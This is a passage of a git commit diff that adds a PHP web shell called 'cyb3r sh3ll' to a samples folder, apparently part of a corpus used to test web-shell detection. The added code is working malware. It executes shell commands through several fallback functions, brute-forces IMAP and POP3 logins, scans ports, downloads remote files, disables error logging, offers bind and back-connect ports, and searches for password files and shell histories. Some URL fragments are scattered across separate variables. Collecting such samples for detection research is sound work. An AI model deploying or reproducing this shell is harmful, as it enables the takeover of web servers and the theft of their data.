From 48936efa96ae17295be4e0a71be3294f0ec6aef8 Mon Sep 17 00:00:00 2001 From: Mathieu Deous Date: Mon, 2 May 2022 20:18:23 +0200 Subject: Make application go-install-able and create a docker image --- data/samples/classic/cyb3rsh3ll.php | 7923 +++++++++++++++++++++++++++++++++++ 1 file changed, 7923 insertions(+) create mode 100644 data/samples/classic/cyb3rsh3ll.php (limited to 'data/samples/classic/cyb3rsh3ll.php') diff --git a/data/samples/classic/cyb3rsh3ll.php b/data/samples/classic/cyb3rsh3ll.php new file mode 100644 index 0000000..e0e0095 --- /dev/null +++ b/data/samples/classic/cyb3rsh3ll.php @@ -0,0 +1,7923 @@ +$v) { + if (strtoupper($k) != "GLOBALS") { + strips($arr["$k"]); + } + } + } else { + $arr = stripslashes($arr); + } + } + } + strips($GLOBALS); +} + +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} +if (!empty($unset_surl)) {setcookie("cyb3r_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("cyb3r_surl",$surl);} +else {$surl = $_REQUEST["cyb3r_surl"]; //Set this cookie for manual SURL + +} +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. +if ($surl_autofill_include and !$_REQUEST["cyb3r_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} + +if (empty($surl)) +{ $surl = "?".$includestr; }//Self url +$surl = htmlspecialchars($surl); +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)"; +//DON'T FORGOT ABOUT PASSWORD!!! + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$gzipencode = False; //Encode with gzip? + +$ax4 ="http://"; +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
Owned by cyb3r.gladiat0r
"; +$release = @php_uname('r'); +$kernel = @php_uname('s'); +$expltlink='http://www.exploit-db.com/search/?action=search&filter_exploit_text='; +if( strpos('Linux', $kernel) !== false ) + $expltlink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); +else + $expltlink .= urlencode( $kernel . ' ' . substr($release,0,3) ); + +/* If you publish free shell and you wish add link to your site or any other information, put here your html. */ + +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder + +//$curdir = getenv("DOCUMENT_ROOT"); +$curdir = getcwd(); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) + +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending + +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0; +function imaplogiN($host,$username,$password){ +$sock=fsockopen($host,143,$n,$s,5); +$b=namE(); +$l=strlen($b); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,"$b LOGIN $username $password\r\n"); +$res=fgets($sock,$l+4); +if ($res == "$b OK")return 1;else return 0; +fclose($sock); +} +function pop3logiN($server,$user,$pass){ +$sock=fsockopen($server,110,$en,$es,5); +if(!$sock)return -1; +fread($sock,1024); +fwrite($sock,"user $user\n"); +$r=fgets($sock); +if($r{0}=='-')return 0; +fwrite($sock,"pass $pass\n"); +$r=fgets($sock); +fclose($sock); +if($r{0}=='+')return 1; +return 0; +} +function check_urL($url,$method,$search,$timeout){ +if(empty($search))$search='200'; +$u=parse_url($url); +$method=strtoupper($method); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$data=(!empty($u['query']))?$u['query']:''; +if(!empty($data))$data="?$data"; +$sock=@fsockopen($host,80,$en,$es,$timeout); +if($sock){ +fputs($sock,"$method $file$data HTTP/1.0\r\n"); +fputs($sock,"Host: $host\r\n"); +if($method=='GET')fputs($sock,"\r\n"); +elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); +else return 0; +if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;} +while(!feof($sock)){ +$res=trim(fgets($sock)); +if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} +} +fclose($sock); +} +return 0; +} +function snmpchecK($ip,$com,$timeout){ +$res=0; +$n=chr(0x00); +$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). +$com. chr(0xA0). +chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n. +chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C). +chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01). +chr(0x01). chr(0x01). $n. chr(0x05). $n; +$sock=@fsockopen("udp://$ip",161); +socket_set_timeout($sock,$timeout); +@fputs($sock,$packet); +socket_set_timeout($sock,$timeout); +$res=fgets($sock); +fclose($sock); +return $res; +} +function checkthisporT($ip,$port,$timeout,$type=0){ +if(!$type){ +$scan=@fsockopen($ip,$port,$n,$s,$timeout); +if($scan){fclose($scan);return 1;} +} +elseif(function_exists('socket_set_timeout')){ +$scan=@fsockopen("udp://".$ip,$port); +if($scan){ +socket_set_timeout($scan,$timeout); +@fwrite($scan,"\x00"); +$s=time(); +fread($scan,1); +if((time()-$s)>=$timeout){fclose($scan);return 1;} +} +} +return 0; +} +function get_sw_namE($host,$timeout){ +$sock=@fsockopen($host,80,$en,$es,$timeout); +if($sock){ +$page=namE().namE(); +fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); +while(!feof($sock)){ +$con=fgets($sock); +if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} +} +fclose($sock); +return -1; +}return 0; +} +function getDisabledFunctions(){ + if(!ini_get('disable_functions')) + { + echo "None"; + } + else + { + echo @ini_get('disable_functions'); + } +} +function showsizE($size){ +if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; +elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; +elseif ($size>=1024)$size = round(($size/1024),2)." KB"; +else $size .= " B"; +return $size; +} +function whereistmP(){ +$uploadtmp=ini_get('upload_tmp_dir'); +$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); +if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; +if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; +if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; +if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; +if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; +return "."; +} +function downloadiT($get,$put){ +$fo=@strtolower(ini_get('allow_url_fopen')); +if($fo || $fo=='on')$con=file_get_contents($get); +else{ +$u=parse_url($get); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$url=fsockopen($host, 80, $en, $es, 12); +fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +$tmp=$con=''; +while($tmp!="\r\n")$tmp=fgets($url); +while(!feof($url))$con.=fgets($url); +} +$mk=file_put_contents($put,$con); +if($mk)return 1; +return 0; +} +function flusheR(){ +flush();@ob_flush(); +} +function namE(){ +$name=''; +srand((double)microtime()*100000); +for ($i=0;$i<=rand(3,10);$i++){ +$name.=chr(rand(97,122)); +} +return $name; +} +function hlinK($str=""){ +$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','sec','cP','mV','rN','deL'); +$ret=$_SERVER['PHP_SELF']."?"; +$new=explode("&",$str); +foreach ($_GET as $key => $v){ +$add=1; +foreach($new as $m){ +$el = explode("=", $m); +if ($el[0]==$key)$add=0; +} +if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&"; +} +$ret.=$str; +return $ret; +} +function shelL($command){ +global $windows,$disablefunctions; +$exec = '';$output= ''; +$dep[]=array('pipe','r');$dep[]=array('pipe','w'); +if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} +elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } +elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} +elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} +elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} +elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} +elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} +return $exec; +} +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line +$cx7 =".com"; +$nixpwdperpage = 100; // Get first N lines from /etc/passwd +$bindport_pass = "cyb3r"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$cx4 ="/x."; +$datapipe_localport = "8081"; // default port for datapipe +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} +$sess_cookie = "cyb3rvars"; // Cookie-variable name +$usefsbuff = TRUE; //Buffer-function +$px7 ="html"; +$copy_unset = FALSE; //Remove copied files from buffer after pasting +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Shell",$surl."act=shells&d=%d"), + array("Cracker",$surl."act=cracker&d=%d"), + array("Scanner",$surl."act=scanner&d=%d"), + array("Net Tools",$surl."act=nettools&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=phpcode&d=%d"), + array("Mailer",$surl."act=mailer&d=%d"), //update this section copy from b3t4k shell hardeep + array("DOS",$surl."act=dos&d=%d"), //update this section copy from b3t4k shell hardeep + array("Local Domain",$surl."act=localdomain&d=%d"), //update this section copy from b3t4k shell hardeep + array("Upload",$surl."act=upload&d=%d"), + array("About",$surl."act=about&d=%d"), //update this section copy from b3t4k shell hardeep + ); +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; +@$f = $_REQUEST["f"]; +@extract($_REQUEST["cyb3rcook"]); +//END CONFIGURATION +// -------------- Traceback Functions +function sendLoginAlert() +{ + global $ownerEmail; + global $url; + $ref=$_SERVER['HTTP_REFERER']; + $agent=$_SERVER['HTTP_USER_AGENT']; + $accesedIp = $_SERVER['REMOTE_ADDR']; + $randomInt = rand(0,1000000); # to avoid id blocking + $from = "cyb3r-sh3ll$randomInt@cyb3r.gladiat0r.com"; + //echo $from; + if(function_exists('mail')) + { + $subject = "Shell Accessed -- cyb3r-Sh3ll --"; + $message = " +Hey Owner , + + Your Shell(cyb3r-Sh3ll) located at $url was accessed by $accesedIp this mail refered by $ref + Your shell was accesed by $agent + + If its not you :- + + 1. Please check if the shell is secured. + 2. Change your user name and Password. + 3. Check if lock is 0n! + + Thanking You + +Yours Faithfully +cyb3r Sh3ll + "; + mail($ownerEmail,$subject,$message,'From:'.$from); + } +} + +//--------------------------------------------------------- +if(function_exists('session_start') && $lock == 'on') +{ + session_start(); +} +else +{ + // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported + $lock = 'off'; +} + +//logout +if(isset($_GET['logout']) && $lock == 'on') +{ + $_SESSION['authenticated'] = 0; + session_destroy(); + header("location: ".$_SERVER['PHP_SELF']); +} + +/***************** Restoring *******************************/ +ini_restore("safe_mode_include_dir"); +ini_restore("safe_mode_exec_dir"); +ini_restore("disable_functions"); +ini_restore("allow_url_fopen"); +ini_restore("safe_mode"); +ini_restore("open_basedir"); +if(function_exists('ini_set')) +{ + ini_set('error_log',NULL); // No alarming logs + ini_set('log_errors',0); // No logging of errors + ini_set('file_uploads',1); // Enable file uploads + ini_set('allow_url_fopen',1); // allow url fopen +} + +else +{ + ini_alter('error_log',NULL); + ini_alter('log_errors',0); + ini_alter('file_uploads',1); + ini_alter('allow_url_fopen',1); +} +// ---------------------------------------------------------------------------------------------------------------- +// \/Next code isn't for editing\/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("cyb3r sh3ll: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +?> + + +cyb3r sh3ll | India - <?php echo getenv("HTTP_HOST"); ?> + + + + + + + +

Lock is Switched Off! , The shell can be accessed by anyone!

+ + + + +
Welcome to the most advanced PHP web Shell- cyb3r Sh3ll :: By cyb3r gl4d!470r ...
+
+ + + + + + + + +
+
+
+



+
+ +
+ Coded by cyb3r 9ladiat0r for all hacking communities working for my motherland.......

+ + Always there to serve my country, My India on any Terms...
+ +
+
+
+
+$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + + $sess_data["copy"] = array_unique($sess_data["copy"]); + + $sess_data["cut"] = array_unique($sess_data["cut"]); + + sort($sess_data["copy"]); + + sort($sess_data["cut"]); + + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} + +} + +} + +cyb3r_buff_prepare(); + +if (!function_exists("cyb3r_sess_put")) + +{ + +function cyb3r_sess_put($data) + +{ + + global $sess_cookie; + + global $sess_data; + + cyb3r_buff_prepare(); + + $sess_data = $data; + + $data = serialize($data); + + setcookie($sess_cookie,$data); + +} + +} + +foreach (array("sort","sql_sort") as $v) + +{ + + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + + if (!empty($_POST[$v])) {$$v = $_POST[$v];} + +} + +if ($sort_save) + +{ + + if (!empty($sort)) {setcookie("sort",$sort);} + + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} + +} + +if (!function_exists("str2mini")) + +{ + +function str2mini($content,$len) + +{ + + if (strlen($content) > $len) + + { + + $len = ceil($len/2) - 2; + + return substr($content, 0,$len)."...".substr($content,-$len); + + } + + else {return $content;} + +} + +} + +if (!function_exists("view_size")) + +{ + +function view_size($size) + +{ + + if (!is_numeric($size)) {return FALSE;} + + else + + { + + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + + else {$size = $size . " B";} + + return $size; + + } + +} + +} + +if (!function_exists("fs_copy_dir")) + +{ + +function fs_copy_dir($d,$t) + +{ + + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + + $h = opendir($d); + + while (($o = readdir($h)) !== FALSE) + + { + + if (($o != ".") and ($o != "..")) + + { + + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + + if (!$ret) {return $ret;} + + } + + } + + closedir($h); + + return TRUE; + +} + +} + +if (!function_exists("fs_copy_obj")) + +{ + +function fs_copy_obj($d,$t) + +{ + + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + + if (is_dir($d)) + + { + + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + + return fs_copy_dir($d,$t); + + } + + elseif (is_file($d)) {return copy($d,$t);} + + else {return FALSE;} + +} + +} + +if (!function_exists("fs_move_dir")) + +{ + +function fs_move_dir($d,$t) + +{ + + $h = opendir($d); + + if (!is_dir($t)) {mkdir($t);} + + while (($o = readdir($h)) !== FALSE) + + { + + if (($o != ".") and ($o != "..")) + + { + + $ret = TRUE; + + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + + if (!$ret) {return $ret;} + + } + + } + + closedir($h); + + return TRUE; + +} + +} + +if (!function_exists("fs_move_obj")) + +{ + +function fs_move_obj($d,$t) + +{ + + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + + if (is_dir($d)) + + { + + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + + return fs_move_dir($d,$t); + + } + + elseif (is_file($d)) + + { + + if(copy($d,$t)) {return unlink($d);} + + else {unlink($t); return FALSE;} + + } + + else {return FALSE;} + +} + +} + +if (!function_exists("fs_rmdir")) + +{ + +function fs_rmdir($d) + +{ + + $h = opendir($d); + + while (($o = readdir($h)) !== FALSE) + + { + + if (($o != ".") and ($o != "..")) + + { + + if (!is_dir($d.$o)) {unlink($d.$o);} + + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + + } + + } + + closedir($h); + + rmdir($d); + + return !is_dir($d); + +} + +} + +if (!function_exists("fs_rmobj")) + +{ + +function fs_rmobj($o) + +{ + + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + + if (is_dir($o)) + + { + + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + + return fs_rmdir($o); + + } + + elseif (is_file($o)) {return unlink($o);} + + else {return FALSE;} + +} + +} + +if (!function_exists("myshellexec")) + +{ + +function myshellexec($cmd) + +{ + + global $disablefunc; + + $result = ""; + + if (!empty($cmd)) + + { + + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + + elseif (($result = `$cmd`) !== FALSE) {} + + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + + elseif (is_resource($fp = popen($cmd,"r"))) + + { + + $result = ""; + + while(!feof($fp)) {$result .= fread($fp,1024);} + + pclose($fp); + + } + + } + + return $result; + +} + +} + +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} + +if (!function_exists("view_perms")) + +{ + +function view_perms($mode) + +{ + + if (($mode & 0xC000) === 0xC000) {$type = "s";} + + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + + else {$type = "?";} + + + + $owner["read"] = ($mode & 00400)?"r":"-"; + + $owner["write"] = ($mode & 00200)?"w":"-"; + + $owner["execute"] = ($mode & 00100)?"x":"-"; + + $group["read"] = ($mode & 00040)?"r":"-"; + + $group["write"] = ($mode & 00020)?"w":"-"; + + $group["execute"] = ($mode & 00010)?"x":"-"; + + $world["read"] = ($mode & 00004)?"r":"-"; + + $world["write"] = ($mode & 00002)? "w":"-"; + + $world["execute"] = ($mode & 00001)?"x":"-"; + + + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + + + return $type.join("",$owner).join("",$group).join("",$world); + +} + +} + +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} + +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} + +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} + +if (!function_exists("parse_perms")) + +{ + +function parse_perms($mode) + +{ + + if (($mode & 0xC000) === 0xC000) {$t = "s";} + + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + + else {$t = "?";} + + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); + +} + +} + +if (!function_exists("parsesort")) + +{ + +function parsesort($sort) + +{ + + $one = intval($sort); + + $second = substr($sort,-1); + + if ($second != "d") {$second = "a";} + + return array($one,$second); + +} + +} + +if (!function_exists("view_perms_color")) + +{ + +function view_perms_color($o) + +{ + + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + + else {return "".view_perms(fileperms($o))."";} + +} + +} + +if (!function_exists("cyb3rgetsource")) + +{ + +function cyb3rgetsource($fn) + +{ + + global $cyb3r_sourcesurl; + + $array = array( + + "cyb3r_bindport.pl" => "cyb3r_bindport_pl.txt", + + "cyb3r_bindport.c" => "cyb3r_bindport_c.txt", + + "cyb3r_backconn.pl" => "cyb3r_backconn_pl.txt", + + "cyb3r_backconn.c" => "cyb3r_backconn_c.txt", + + "cyb3r_datapipe.pl" => "cyb3r_datapipe_pl.txt", + + "cyb3r_datapipe.c" => "cyb3r_datapipe_c.txt", + + ); + +} + +} + +if (!function_exists("mysql_dump")) + +{ + +function mysql_dump($set) + +{ + + global $shver; + + $sock = $set["sock"]; + + $db = $set["db"]; + + $print = $set["print"]; + + $nl2br = $set["nl2br"]; + + $file = $set["file"]; + + $add_drop = $set["add_drop"]; + + $tabs = $set["tabs"]; + + $onlytabs = $set["onlytabs"]; + + $ret = array(); + + $ret["err"] = array(); + + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + + if (empty($db)) {$db = "db";} + + if (empty($print)) {$print = 0;} + + if (empty($nl2br)) {$nl2br = 0;} + + if (empty($add_drop)) {$add_drop = TRUE;} + + if (empty($file)) + + { + + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + + } + + if (!is_array($tabs)) {$tabs = array();} + + if (empty($add_drop)) {$add_drop = TRUE;} + + if (sizeof($tabs) == 0) + + { + + // retrive tables-list + + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + + } + + $out = "# Dumped by cyb3rell.SQL v. ".$shver." + +# Home page: http://ccteam.ru + +# + +# Host settings: + +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." + +# Date: ".date("d.m.Y H:i:s")." + +# DB: \"".$db."\" + +#--------------------------------------------------------- + +"; + + $c = count($onlytabs); + + foreach($tabs as $tab) + + { + + if ((in_array($tab,$onlytabs)) or (!$c)) + + { + + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + + // recieve query for create table structure + + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + + if (!$res) {$ret["err"][] = mysql_smarterror();} + + else + + { + + $row = mysql_fetch_row($res); + + $out .= $row["1"].";\n\n"; + + // recieve table variables + + $res = mysql_query("SELECT * FROM `$tab`", $sock); + + if (mysql_num_rows($res) > 0) + + { + + while ($row = mysql_fetch_assoc($res)) + + { + + $keys = implode("`, `", array_keys($row)); + + $values = array_values($row); + + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + + $values = implode("', '", $values); + + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + + $out .= $sql; + + } + + } + + } + + } + + } + + $out .= "#---------------------------------------------------------------------------------\n\n"; + + if ($file) + + { + + $fp = fopen($file, 